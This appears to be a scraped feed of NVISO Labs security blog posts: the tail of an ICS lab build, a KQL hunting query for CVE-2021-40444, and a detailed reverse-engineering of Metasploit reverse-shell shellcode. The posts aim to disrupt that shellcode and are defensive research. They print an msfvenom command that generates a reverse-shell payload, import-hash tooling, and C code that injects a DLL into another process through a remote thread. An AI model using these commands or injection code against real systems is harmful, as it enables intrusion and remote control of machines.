At this point, all that was left to do now was to figure out which PLC to use for which task. This required digging through quite some datasheets of the abovementioned PLCs, mainly to find out how many and what digital inputs and outputs the PLCs feature. For example we learned that, to control stepper motors, we needed to create pulse-signals (in our case Pulse-Train-Outputs, PTOs) of up to 100kHz. During our research, a rather cheap signal-board for the S7-1200 turned up that would generate PTOs of up to 200kHz. We ended up using the S7-1200 PLCs to drive the leaves and barriers, the S7-300 to control LEDs and the buzzer and the S7-1500 for orchestration and outbound communication to the virtualized IT environment.

4. Our Vision

With all this information we worked out there, we came up with a vision of what we wanted our lab to look like:

3D concept of the mobile lab

It’s essentially an aluminium frame on wheels, featuring a 3D printed bridge on-top and a steelplate put inside it vertically. The OT components are mounted onto the front-facing side of the steel-plate and the virtualization server running the IT systems and networks is located in the back. The black panels are made of wood and hide the power distribution and the server. It may be hard to pick up visually, but there are acryllic glass panels on the sides and the front to provide a look inside.

With this vision in mind, we set out to build it!

We are going to cover this in the next blog post about our ICS firing range – Stay tuned!

✇ NVISO Labs

Kusto hunting query for CVE-2021-40444

By: bparys

Introduction

On September 7th 2021, Microsoft published customer guidance concerning CVE-2021-40444, an MSHTML Remote Code Execution Vulnerability:

Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.

An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Microsoft

In practice, the attack basically involves a specially-crafted Microsoft Office document, which includes an ActiveX element, which activates the MSHTML component. The vulnerability as such resides in this MSHTML component.

Seeing there is reported exploitation in the wild (ITW), we decided to write a quick Kusto (KQL) rule that allows for hunting in Microsoft Defender ATP.

The query

let process = dynamic(["winword.exe","wordview.exe","wordpad.exe","powerpnt.exe","excel.exe"]);
DeviceImageLoadEvents
| where FileName in ("mshtml.dll", "Microsoft.mshtml.dll")
| where InitiatingProcessFileName in~ (process) 
//We only want actual files ran, not Office restore operations etc.
| where strlen(InitiatingProcessCommandLine) > 40
| project Timestamp, DeviceName, InitiatingProcessFolderPath, 
    InitiatingProcessParentFileName, InitiatingProcessParentCreationTime, 
    InitiatingProcessCommandLine

In this query, the following is performed:

  • Add relevant Microsoft Office process names to an array;
  • Add both common filenames for MSHTML;
  • Get a string length larger than 40 characters: this is to weed out false positives, for example where the command line only contains the process in question and a parameter such as /restore or /safe;
  • Display the results.

Results

This was of course tested – a sample set of over 10,000 endpoints across several environments and spanning 7 days, delivered a total of 37 results. These results can be broken down as follows:

Figure 1 – Query Results

None of these processes are anomalous per se:

  • Explorer.exe: graphical user interface, the result of a user opening, for example, Microsoft Word from their Documents folder;
  • Protocolhandler.exe: handles URI schemes in Microsoft Office;
  • Outlook.exe: Microsoft’s email client;
  • Runtimebroker.exe: helps manage permissions from Microsoft Store apps (such as Microsoft Office).

While each of these processes warrant a closer look, you’ll be able to assess quicker if there’s anything anomalous going on by verifying what’s in the InitiatingProcessCommandLine column.

If it contains a remote web address, the file was likely opened from SharePoint or from another online location. If it does not contain a remote web address, the file is stored and opened locally.

Pay special attention to files opened locally or launched by Outlook as parent process: chances are likely this is the result from a phishing email. In case you suspect a true positive:

  • Verify with the user if they have knowledge of opening this file, and if it was from an email they were expecting;
  • If possible, grab a copy of the file and use the option to submit to Microsoft (or a private sandbox of your choice; if public sandbox, then know that what you upload is public to everyone) to further determine if it is malicious;
  • Perform a separate investigation on the user or their device to determine if there’s any other events that may be out of the ordinary.

Ultimately, you can leverage the following process:

  • Run the query for a first time, and for a limited time period (7 days as in our example) or limited set of hosts;
  • Investigate each to create a baseline, and separate the wheat from the chaff (or the true from false positive);
  • Finetune the Kusto query above to your environment;
  • Happy hunting!

Conclusion

A vulnerability actively exploited in the MSHTML component affects in theory all Microsoft Office products that make use of it.

Patch as soon as Microsoft has a patch available (potentially, an out-of-band patch will be created soon) and apply the Mitigations and Workaround as described by Microsoft:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444

Thanks to our colleagues Remco and Niels for performing unit tests.

✇ NVISO Labs

Anatomy and Disruption of Metasploit Shellcode

By: Maxime Thiebaut

In April 2021 we went through the anatomy of a Cobalt Strike stager and how some of its signature evasion techniques ended up being ineffective against detection technologies. In this blog post we will go one level deeper and focus on Metasploit, an often-used framework interoperable with Cobalt Strike.

Throughout this blog post we will cover the following topics:

  1. The shellcode’s import resolution – How Metasploit shellcode locates functions from other DLLs and how we can precompute these values to resolve any imports from other payload variants.
  2. The reverse-shell’s execution flow – How trivial a reverse shell actually is.
  3. Disruption of the Metasploit import resolution – A non-intrusive deception technique (no hooks involved) to have Metasploit notify the antivirus (AV) of its presence with high confidence.

For this analysis, we generated our own shellcode using Metasploit under version v6.0.30-dev. The malicious sample generated using the command below had as resulting SHA256 hash of 3792f355d1266459ed7c5615dac62c3a5aa63cf9e2c3c0f4ba036e6728763903 and is available on VirusTotal for readers willing to have a try themselves.

msfvenom -p windows/shell_reverse_tcp -a x86 > shellcode.vir

Throughout the analysis we have renamed functions, variables and offsets to reflect their role and improve clarity.

Initial Analysis

In this section we will outline the initial logic followed to determine the next steps of the analysis (import resolution and execution flow analysis).

While a typical executable contains one or more entry-points (exported functions, TLS-callbacks, …), shellcode can be seen as the most primitive code format where initial execution occurs from the first byte.

Analyzing the generated shellcode from the initial bytes outlines two operations:

  1. The first instruction at ① can be ignored from an analytical perspective. The cld operation clears the direction flag, ensuring string data is read on-wards instead of back-wards (e.g.: cmd vs dmc).
  2. The second call operation at ② transfers execution to a function we named Main, this function will contain the main logic of the shellcode.
Figure 1: Disassembled shellcode calling the Main function.

Within the Main function, we observe additional calls such as the four ones highlighted in the trimmed figure below (③, ④, ⑤ and ⑥). These calls target a yet unidentified function whose address is stored in the ebp register. To understand where this function is located, we will need to take a step back and understand how a call instruction operates.

Figure 2: Disassembly of the Main function.

A call instruction transfers execution to the target destination by performing two operations:

  1. It pushes the return address (the memory address of the instruction located after the call instruction) on the stack. This address can later be used by the ret instruction to return execution from the called function (callee) back to the calling function (caller).
  2. It transfers execution to the target destination (callee), as a jmp instruction would.

As such, the first pop instruction from the Main function at ③ stores the caller’s return address into the ebp register. This return address is then called as a function later on, among others at offset 0x99, 0xA9 and 0xB8 (④, ⑤ and ⑥). This pattern, alongside the presence of a similarly looking push before each call tends to suggest the return address stored within ebp is the dynamic import resolution function.

Without diving into unnecessary depth, a “normal” executable (e.g.: Portable Executable on Windows) contains the necessary information so that, once loaded by the Operating System (OS) loader, the code can call imported routines such as those from the Windows API (e.g.: LoadLibraryA). To achieve this default behavior, the executable is expected to have a certain structure which the OS can interpret. As shellcode is a bare-bone version of the code (it has none of the expected structures), the OS loader can’t assist it in resolving these imported functions; even more so, the OS loader will fail to “execute” a shellcode file. To cope with this problem, shellcode commonly performs a “dynamic import resolution”.

One of the most common techniques to perform “dynamic import resolution” is by hashing each available exported function and compare it with the required import’s hash. As shellcode authors can’t always predict whether a specific DLL (e.g.: ws3_32.dll for Windows Sockets) and its exports are already loaded, it is not uncommon to observe shellcode loading DLLs by calling the LoadLibraryA function first (or one of its alternatives). Relying on LoadLibraryA (or alternatives) before calling other DLLs’ exports is a stable approach as these library-loading functions are part of kernel32.dll, one of the few DLLs which can be expected to be loaded into each process.

To confirm our above theory, we can search for all call instructions as can be seen in the following figure (e.g.: using IDA’s Text... option under the Search menu). Apart from the first call to the Main function, all instances refer to the ebp register. This observation, alongside well-known constants we will observe in the next section, supports our theory that the address stored in ebp holds a pointer to the function performing the dynamic import resolution.

Figure 3: All call instructions in the shellcode.

The abundance of calls towards the ebp register suggests it indeed holds a pointer to the import resolution function, which we now know is located right after the first call to Main.

Import Resolution Analysis

So far we noticed the instructions following the initial call to Main play a crucial role as what we expect to be the import resolution routine. Before we analyze the shellcode’s logic, let us analyze this resolution routine as it will ease the understanding of the remaining calls.

From Import Hash to Function

The code located immediately after the initial call to Main is where the import resolution starts. To resolve these imports, the routine first locates the list of modules loaded into memory as these contain their available exported functions.

To find these modules, an often leveraged shellcode technique is to interact with the Process Environment Block (shortened as PEB).

In computing the Process Environment Block (abbreviated PEB) is a data structure in the Windows NT operating system family. It is an opaque data structure that is used by the operating system internally, most of whose fields are not intended for use by anything other than the operating system. […] The PEB contains data structures that apply across a whole process, including global context, startup parameters, data structures for the program image loader, the program image base address, and synchronization objects used to provide mutual exclusion for process-wide data structures.

wikipedia.org

As can be observed in figure 4, to access the PEB, the shellcode accesses the Thread Environment Block (TEB) which is immediately accessible through a register (⑦). The TEB structure itself contains a pointer to the PEB (⑦). From the PEB, the shellcode can locate the PEB_LDR_DATA structure (⑧) which in turn contains a reference to multiple double-linked module lists. As can be observed at (⑨), the Metasploit shellcode leverages one of these double-linked lists (InMemoryOrderModuleList) to later iterate through the LDR_DATA_TABLE_ENTRY structures containing the loaded module information.

Once the first module is identified, the shellcode retrieves the module’s name (BaseDllName.Buffer) at ⑩ and the buffer’s maximum length ( BaseDllName.MaximumLength) at ⑪ which is required as the buffer is not guaranteed to be NULL-terminated.

Figure 4: Disassembly of the initial module retrieval.

One point worth highlighting is that, as opposed to usual pointers (TEB.ProcessEnvironmentBlock, PEB.Ldr, …), a double-linked list points to the next item’s list entry. This means that instead of pointing to the structures’ start, a pointer from the list will target a non-zero offset. As such, while in the following figure the LDR_DATA_TABLE_ENTRY has the BaseDllName property at offset 0x2C, the offset from the list entry’s perspective will be 0x24 (0x2C-0x08). This can be observed in the above figure 4 where an offset of 8 has to be subtracted to access both of the BaseDllName properties at ⑩ and ⑪.

Figure 5: From TEB to BaseDllName.

With the DLL name’s buffer and maximum length recovered, the shellcode proceeds to generate a hash. To do so, the shellcode performs a set of operations for each ASCII character within the maximum name length:

  1. If the character is lowercase, it gets modified into an uppercase. This operation is performed according to the character’s ASCII representation meaning that if the value is 0x61 or higher (a or higher), 0x20 gets subtracted to fall within the uppercase range.
  2. The generated hash (initially 0) is rotated right (ROR) by 13 bits (0x0D).
  3. The upper-cased character is added to the existing hash.
Figure 6: Schema depicting the hashing loops of KERNEL32.DLL‘s first character (K).

With the repeated combination of rotations and additions on a fixed registry size (32 bits in edi‘s case), characters will ultimately start overlapping. These repeated and overlapping combinations make the operations non-reversible and hence produces a 32-bit hash/checksum for a given name.

One interesting observation is that while the BaseDllName in LDR_DATA_TABLE_ENTRY is Unicode-encoded (2 bytes per character), the code treats it as ASCII encoding (1 byte per character) by using lodsb (see ⑫).

Figure 7: Disassembly of the module’s name hashing routine.

The hash generation algorithm can be implemented in Python as shown in the snippet below. While we previously mentioned that the BaseDllName‘s buffer was not required to be NULL-terminated per Microsoft documentation, extensive testing has showed that NULL-termination was always the case and could generally be assumed. This assumption is what makes the MaximumLength property a valid boundary, similarly to the Length property. The following snippet hence expects the data passed to get_hash to be a Python bytes object generated from a NULL-terminated Unicode string.

# Helper function for rotate-right on 32-bit architectures
def ror(number, bits):
    return ((number >> bits) | (number << (32 - bits))) & 0xffffffff

# Define hashing algorithm
def get_hash(data):
    # Initialize hash to 0
    result = 0
    # Loop each character
    for b in data:
        # Make character uppercase if needed
        if b < ord('a'):
            b -= 0x20
        # Rotate DllHash right by 0x0D bits
        result = ror(result, 0x0D)
        # Add character to DllHash
        result = (result + b) & 0xffffffff
    return result

The above functions could be used as follows to compute the hash of KERNEL32.DLL.

# Define a NULL-terminated base DLL name
name = 'KERNEL32.DLL\0'
# Encode it as Unicode
encoded = name.encode('UTF-16-LE')
# Compute the hash
value = hex(get_hash(encoded))
# And print it ('0x92af16da')
print(value)

With the DLL name’s hash generated, the shellcode proceeds to identify all exported functions. To do so, the shellcode starts by retrieving the LDR_DATA_TABLE_ENTRY‘s DllBase property (⑬) which points to the DLL’s in-memory address. From there, the IMAGE_EXPORT_DIRECTORY structure is identified by walking the Portable Executable’s structures (⑭ and ⑮) and adding the relative offsets to the DLL’s in-memory base address. This last structure contains the number of exported function names (⑰) as well as a table of pointers towards these (⑯).

Figure 8: Disassembly of the export retrieval.

The above operations can be schematized as follow, where dotted lines represent addresses computed from relative offsets increased by the DLL’s in-memory base address.

Figure 9: From LDR_DATA_TABLE_ENTRY to IMAGE_EXPORT_DIRECTORY.

Once the number of exported names and their pointers are identified, the shellcode enumerates the table in descending order. Specifically, the number of names is used as a decremented counter at ⑱. For each exported function’s name and while none matches, the shellcode performs a hashing routine (hash_export_name at ⑲) similar to the one we observed previously, with as sole difference that character cases are preserved (hash_export_character).

The final hash is obtained by adding the recently computed function hash (ExportHash) to the previously obtained module hash (DllHash) at ⑳. This addition is then compared at ㉑ to the sought hash and, unless they match, the operation starts again for the next function.

Figure 10: Disassembly of export’s name hashing.

If none of the exported functions match, the routine retrieves the next module in the InMemoryOrderLinks double-linked list and performs the above operations again until a match is found.

Figure 11: Disassembly of the loop to the next module.

The above walked double-linked list can be schematized as the following figure.

Figure 12: Walking the InMemoryOrderModuleList.

If a match is found, the shellcode will proceed to call the exported function. To retrieve its address from the previously identified IMAGE_EXPORT_DIRECTORY, the code will first need to map the function’s name to its ordinal (㉒), a sequential export number. Once the ordinal is recovered from the AddressOfNameOrdinals table, the address can be obtained by using the ordinal as an index in the AddressOfFunctions table (㉓).

Figure 13: Disassembly of the import “call”.

Finally, once the export’s address is recovered, the shellcode simulates the call behavior by ensuring the return address is first on the stack (removing the hash it was searching for, at ㉔) , followed by all parameters as required by the default Win32 API __stdcall calling convention (㉕). The code then performs a jmp operation at ㉖ to transfer execution to the dynamically resolved import which, upon return, will resume from where the initial call ebp operation occurred.

Overall, the dynamic import resolution can be schematized as a nested loop. The main loop walks modules following the in-memory order (blue in the figure below) while, for each module, a second loop walks exported functions looking for a matching hash between desired import and available exports (red in the figure below).

Figure 14: The import resolution flow.

Building a Rainbow Table

Identifying which imports the shellcode relies on will provide us with further insight into the rest of its logic. Instead of dynamically analyzing the shellcode, and given that we have figured out the hashing algorithm above, we can build ourselves a rainbow table.

A rainbow table is a precomputed table for caching the output of cryptographic hash functions, usually for cracking password hashes.

wikipedia.org

The following Python snippet computes the “Metasploit” hashes for DLL exports located in the most common system locations.

import glob
import os
import pefile
import sys

size = 32
mask = ((2**size) - 1)

# Resolve 32- and 64-bit System32 paths
root = os.environ.get('SystemRoot')
if not root:
    raise Exception('Missing "SystemRoot" environment variable')

globs = [f"{root}\\System32\\*.dll", f"{root}\\SysWOW64\\*.dll"]

# Helper function for rotate-right
def ror(number, bits):
    return ((number >> (bits % size)) | (number << (size - (bits % size)))) &  mask

# Define hashing algorithm
def get_hash(data):
    result = 0
    for b in data:
        result = ror(result, 0x0D)
        result = (result + b) & mask
    return result

# Helper function to uppercase data
def upper(data):
    return [(b if b < ord('a') else b - 0x20) for b in data]

# Print CSV header
print("File,Function,IDA,Yara")

# Loop through all DLLs
for g in globs:
    for file in glob.glob(g):
        # Compute the DllHash
        name = upper(os.path.basename(file).encode('UTF-16-LE') + b'\x00\x00')
        file_hash = get_hash(name)
        try:
            # Parse the DLL for exports
            pe = pefile.PE(file, fast_load=True)
            pe.parse_data_directories(directories = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]])
            if hasattr(pe, "DIRECTORY_ENTRY_EXPORT"):
                # Loop through exports
                for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
                    if exp.name:
                        # Compute ExportHash
                        name = exp.name.decode('UTF-8')
                        exp_hash = get_hash(exp.name + b'\x00')
                        metasploit_hash = (file_hash + exp_hash) & 0xffffffff
                        # Compute additional representations
                        ida_view = metasploit_hash.to_bytes(size/8, byteorder='big').hex().upper() + "h"
                        yara_view = metasploit_hash.to_bytes(size/8, byteorder='little').hex(' ')
                        # Print CSV entry
                        print(f"\"{file}\",\"{name}\",\"{ida_view}\",\"{{{yara_view}}}\"")
        except pefile.PEFormatError:
            print(f"Unable to parse {file} as a valid PE, skipping.", file=sys.stderr)
            continue

As an example, the following PowerShell commands generate a rainbow table, then searches it for the 726774Ch hash we observed first in figure 2. For everyone’s convenience, we have published our rainbow.csv version containing 239k hashes.

# Generate the rainbow table in CSV format
PS > .\rainbow.py | Out-File .\rainbow.csv -Encoding UTF8

# Search the rainbow table for a hash
PS > Get-Content .\rainbow.csv | Select-String 726774Ch
"C:\Windows\System32\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"
"C:\Windows\SysWOW64\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"

As can be observed above, the first import resolved and called by the shellcode is LoadLibraryA, exported by the 32- and 64-bit kernel32.dll.

Execution Flow Analysis

With the import resolving sorted-out, understanding the remaining code becomes a lot more accessible. As we can see in figure 15, the shellcode starts by performing the following calls:

  1. LoadLibraryA at ㉗ to ensure the ws3_32 library is loaded. If not yet loaded, this will map the ws3_32.dll DLL in memory, enabling the shellcode to further resolve additional functions related to the Windows Socket 2 technology.
  2. WSAStartup at ㉘ to initiate the usage of sockets within the shellcode’s process.
  3. WSASocketA at ㉙ to create a new socket. This one will be a stream-based (SOCK_STREAM) socket over IPv4 (AF_INET).
Figure 15: Disassembly of the socket initialization.

Once the socket is created, the shellcode proceeds to call the connect function at ㉝ with the sockaddr_in structure previously pushed on the stack (㉜). The sockaddr_in structure contains valuable information from an incident response perspective such as the protocol (0x0200 being AF_INET, a.k.a. IPv4, in little endianness), the port (0x115c being the default 4444 Metasploit port in big endianness) as well as the C2 IPv4 address at ㉛ (0xc0a801ca being 192.168.1.202 in big endianness).

If the connection fails, the shellcode retries up to 5 times (decrementing at ㉞ the counter defined at ㉚) after which it will abort execution using ExitProcess (㉟).

Figure 16: Disassembly of the socket connection.

If the connection succeeds, the shellcode will create a new cmd process and connect all of its Standard Error, Output and Input (㊱) to the established C2 socket. The process itself is started through a CreateProcessA call at ㊲.

Figure 17: Execution of the reverse-shell.

Finally, while the process is running, the shellcode performs the following operations:

  1. Wait indefinitely at ㊳ for the remote shell to terminate by calling WaitForSingleObject.
  2. Once terminated, identify the Windows operating system version at ㊴ using GetVersion and exit at ㊵ using either ExitProcess or RtlExitUserThread.
Figure 18: Termination of the shellcode.

Overall, the execution flow of Metasploit’s windows/shell_reverse_tcp shellcode can be schematized as follows:

Figure 19: Metasploit’s TCP reverse-shell execution flow.

Shellcode Disruption

With the execution flow analysis squared away, let’s see how we can turn the tables on the shellcode and disrupt it. From an attacker’s perspective, the shellcode itself is considered trusted while the environment it runs in is hostile. This section will build upon the assumption that we don’t know where shellcode is executing in memory and, as such, hooking/modifying the shellcode itself is not an acceptable solution.

In this section we will firstly focus on the theoretical aspects before covering a proof-of-concept implementation.

The Weaknesses

CWE-1288: Improper Validation of Consistency within Input

The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent.

cwe.mitre.org

From the shellcode’s perspective only two external interactions provide a possible attack surface. The first and most obvious surface is the C2 channel where some security solutions can detect/impair either the communications protocol or the surrounding API calls. This attack surface however has the massive caveat that security solutions have to make the distinction between legitimate and malicious behaviors, possibly resulting in some medium/low-confidence detection.

A second less obvious attack surface is the import resolution itself which, from the shellcode’s perspective, relies on external process data. Within this import resolution routine, we observed how the shellcode relied on the BaseDllName property to generate a hash for each module.

Figure 20: The hashing routine retrieving both Buffer and MaximumLength to hash a module’s BaseDllName.

While the module’s exports were UTF-8 NULL-terminated strings, the BaseDllName property was a UNICODE_STRING structure. This structure contains multiple properties:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

Length: The length, in bytes, of the string stored in Buffer.

MaximumLength: The length, in bytes, of Buffer.

Buffer: Pointer to a buffer used to contain a string of wide characters.

[…]

If the string is null-terminated, Length does not include the trailing null character.

The MaximumLength is used to indicate the length of Buffer so that if the string is passed to a conversion routine such as RtlAnsiStringToUnicodeString the returned string does not exceed the buffer size.

docs.microsoft.com

While not explicitly mentioned in the above documentation, we can implicitly understand that the buffer’s MaximumLength property is unrelated to the actual string’s Length property. The Unicode string does not need to consume the entire Buffer, neither is it guaranteed to be NULL-terminated. Theoretically, the Windows API should only consider the first Length bytes of the Buffer for comparison, ignoring any bytes between the Length and MaximumLength positions. Increasing a UNICODE_STRING‘s buffer (Buffer and MaximumLength) should not impact functions relying on the stored string.

As the shellcode’s hashing routine relies on the buffer’s MaximumLength, similar strings within differently-sized buffers will generate different hashes. This flaw in the hashing routine can be leveraged to neutralize potential Metasploit shellcode. From a technical perspective, as security solutions already hook process creation and inject themselves, interfering with the hashing routine without knowledge of its existence or location can be achieved by increasing the BaseDllName buffer for modules required by Metasploit (e.g.: kernel32.dll).

This hash-input validation flaw is what we will leverage next as initial vector to cause a Denial of Service as well as an Execution Flow Hijack.

CWE-823: Use of Out-of-range Pointer Offset

The program performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer.

cwe.mitre.org

One observation we made earlier is how the shellcode loops modules indefinitely until a matching export is found. As we found a flaw to alter hashes, let us analyze what happens if all hashes fail to match.

While walking the double-linked list could loop indefinitely, the shellcode will actually generate an “Access Violation” error once all modules have been checked. This exception is not generated explicitly by the shellcode but rather occurs as the code doesn’t verify the list’s boundaries. Given that for each item in the list the BaseDllName.Buffer pointer is loaded from offset 0x28, an exception will occur once we access the first non-LDR_DATA_TABLE_ENTRY item in the list. As shown in the figure below, this will be the case once the shellcode loops back to the first PEB_LDR_DATA structure, at which stage an out-of-bounds read will occur resulting in an invalid pointer being de-referenced.

Figure 21: An out-of-bounds read when walking the InMemoryOrderModuleList double-linked list.

Although from a defensive perspective causing a Denial of Service is better than having Metasploit shellcode execute, let’s see how one could further exploit the above flaw to the defender’s advantage.

Abusing CWE-1288 to Hijack the Execution Flow

One module of interest is kernel32.dll which, as previously analyzed in the “Execution Flow Analysis” section, is the first required module in order to call the LoadLibraryA function. During the hashing routine, the kernel32.dll hash is computed to be 0x92af16da. By applying the above buffer-resize technique, we can ensure the shellcode loops additional modules since the original hashes won’t match. From here, a security solution has a couple of options:

  • Our injected security solution’s DLL could be named kernel32.dll. While its hashes would match, having two modules named kernel32.dll might have unintended consequences on legitimate calls to LoadLibraryA.
  • Similarly, as we are already modifying buffers in LDR_DATA_TABLE_ENTRY structures, we could easily save the original values of the kernel32.dll buffer and assign them to our security solution’s injected module. While this would theoretically work, having a second buffer in memory called kernel32.dll isn’t a great idea as previously mentioned.
  • Alternatively, our security solution’s injected module could have a different name, as long as there is a hash-collision with the original hash. This technique won’t impact legitimate calls such as LoadLibraryA as these rely on value-based comparisons, as opposed to the shellcode’s hash-based comparisons.

We previously observed how the Metasploit shellcode performed hashing using additions and rotations on ASCII characters (1-byte). As a follow-up on figure 6, the following schema depicts the state of KERNEL32.DLL‘s hash on the third loop, where the ASCII characters K and E overlap. As one might observe, the NULL character is a direct consequence of performing 1-byte operations on what initially is a Unicode string (2-byte).

Figure 22: The first and third ASCII characters overlapping.

To obtain a hash collision, we need to identify changes which we can perform on the initial KERNEL32.DLL string without altering the resulting hash. The following figure highlights how there is a 6-bit relationship between the first and third ASCII character. By subtracting the second bit of the first character, we can increment the eighth bit (2+6) of the third character without affecting the resulting hash.

Figure 23: A hash collision between the first and third ASCII characters.

While the above collision is not practical (the ASCII or Unicode character 0xC5 is not within the alphanumeric range), we can apply the same principle to identify acceptable relationships. The following Python snippet brute-forces the relationships among Unicode characters for the KERNEL32.DLL string assuming we don’t alter the string’s length.

name = "KERNEL32.DLL\0"
for i in range(len(name)):
    for j in range(len(name)):
        # Avoid duplicates
        if j <= i:
            continue
        # Compute right-shift/left-shift relationships
        # We shift twice by 13 bits due to Unicode being twice the size of ASCII.
        # We perform a modulo of 32 due to the registers being, in our case,  32 bits in size.
        relation = ((13*2*(j-i))%32)
        if relation > 16:
            relation -= 32
        # Get close relationships (0, 1, 2 or 3 bit-shifts)
        if -3 <= relation <= 3:
            print(f"Characters at index {i} and {j:2d} have a relationship of {relation} bits")
# "Characters at index 0 and  5 have a relationship of 2 bits"
# "Characters at index 0 and 11 have a relationship of -2 bits"
# "Characters at index 1 and  6 have a relationship of 2 bits"
# "Characters at index 1 and 12 have a relationship of -2 bits"
# "Characters at index 2 and  7 have a relationship of 2 bits"
# "Characters at index 3 and  8 have a relationship of 2 bits"
# "Characters at index 4 and  9 have a relationship of 2 bits"
# "Characters at index 5 and 10 have a relationship of 2 bits"
# "Characters at index 6 and 11 have a relationship of 2 bits"
# "Characters at index 7 and 12 have a relationship of 2 bits"

As observed above, multiple character pairs can be altered to cause a hash collision. As an example, there is a 2-bit left-shift relation between the characters at Unicode position 0 and 11.

Given a 2-bit left-shift is similar to a multiplication by 4, incrementing the Unicode character at position 0 by any value requires decrementing the character at position 11 by 4 times the same value to keep the Metasploit hash intact. The following Python commands highlight the different possible combinations between these two characters for KERNEL32.DLL.

# The original hash (0x92af16da)
print(hex(get_hash(upper('KERNEL32.DLL\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Decrementing 'K' by 3 requires adding 12 to 'L'
print(hex(get_hash(upper('HERNEL32.DLX\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Decrementing 'K' by 2 requires adding 8 to 'L'
print(hex(get_hash(upper('IERNEL32.DLT\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Decrementing 'K' by 1 requires adding 4 to 'L'
print(hex(get_hash(upper('JERNEL32.DLP\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Incrementing 'K' by 1 requires substracting 4 from 'L'
print(hex(get_hash(upper('LERNEL32.DLH\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Incrementing 'K' by 2 requires substracting 8 from 'L'
print(hex(get_hash(upper('MERNEL32.DLD\0'.encode('UTF-16-LE')))))
# "0x92af16da"

This hash collision combined with the buffer-resize technique can be chained to ensure our custom DLL gets evaluated as KERNEL32.DLL in the hashing routine. From here, if we export a LoadLibraryA function, the Metasploit import resolution will incorrectly call our implementation resulting in an execution flow hijack. This hijack can be leveraged to signal the security solution about a high-confidence Metasploit import resolution taking place.

Building a Proof of Concept

To demonstrate our theory, let’s build a proof-of-concept DLL which will, once loaded, make use of CWE-1288 to simulate how an EDR (Endpoint Detection and Response) solution could detect Metasploit without prior knowledge of its in-memory location. As we want to exploit the above hash collisions, our DLL will be named hernel32.dlx.

The proof of concept has been published on NVISO’s GitHub repository.

The Process Injection

To simulate how a security solution would be injected into most processes, let’s build a simple function which will run our DLL into a process of our choosing.

The Inject function will trick the targeted process into loading a specific DLL (our hernel32.dlx) and execute its DllMain function from where we’ll trigger the buffer-resizing. While multiple techniques exist, we will simply write our DLL’s path into the target process and create a remote thread calling LoadLibraryA. This remote thread will then load our DLL as if the target process intended to do it.

METASPLOP_API
void
Inject(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    #pragma EXPORT
    int PID;
    HMODULE hKernel32;
    FARPROC fLoadLibraryA;
    HANDLE hProcess;
    LPVOID lpInject;

    // Recover the current module path
    char payload[MAX_PATH];
    int size;
    if ((size = GetModuleFileNameA(hPayload, payload, MAX_PATH)) == NULL)
    {
        MessageBoxError("Unable to get module file name.");
        return;
    }
    
    // Recover LoadLibraryA 
    hKernel32 = GetModuleHandle(L"Kernel32");
    if (hKernel32 == NULL)
    {
        MessageBoxError("Unable to get a handle to Kernel32.");
        return;
    }
    fLoadLibraryA = GetProcAddress(hKernel32, "LoadLibraryA");
    if (fLoadLibraryA == NULL)
    {
        MessageBoxError("Unable to get LoadLibraryA address.");
        return;
    }

    // Open the processes
    PID = std::stoi(lpszCmdLine);
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    if (!hProcess)
    {
        char message[200];
        if (sprintf_s(message, 200, "Unable to open process %d.", PID) > 0)
        {
            MessageBoxError(message);
        }
        return;
    }

    // Allocated memory for the injection
    lpInject = VirtualAllocEx(hProcess, NULL, size + 1, MEM_COMMIT, PAGE_READWRITE);
    if (lpInject)
    {
        wchar_t buffer[100];
        wsprintfW(buffer, L"You are about to execute the injected library in process %d.", PID);
        if (WriteProcessMemory(hProcess, lpInject, payload, size + 1, NULL) && IDCANCEL != MessageBox(NULL, buffer, L"NVISO Mock AV", MB_ICONINFORMATION | MB_OKCANCEL))
        {
            CreateRemoteThread(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)fLoadLibraryA, lpInject, NULL, NULL);
        }
        else
        {
            VirtualFreeEx(hProcess, lpInject, NULL, MEM_RELEASE);
        }
    }
    else
    {
        char message[200];
        if (sprintf_s(message, 200, "Unable to allocate %d bytes.", size+1) > 0)
        {
            MessageBoxError(message);
        }
    }
    CloseHandle(hProcess);
    return;
}

As one might notice, the above code relies on the hPayload variable. This variable will be defined in the DllMain function as we aim to get the current DLL’s module regardless of its name, whereas GetModuleHandleA would require us to hard-code the hernel32.dlx name.

HMODULE hPayload;

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hPayload = hModule;
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

With our Inject method exported, we can now proceed to build the logic needed to trigger CWE-1288.

The Buffer-Resizing

Resizing the BaseDllName buffer from the kernel32.dll module can be accomplished using the logic below. Similar to the shellcode’s technique, we will recover the PEB, walk the InMemoryOrderModuleList and once the KERNEL32.DLL module is found, increase its buffer by 1.

void
Metasplop() {
    PPEB pPeb = NULL;
    PPEB_LDR_DATA pLdrData = NULL;
    PLIST_ENTRY pHeadEntry = NULL;
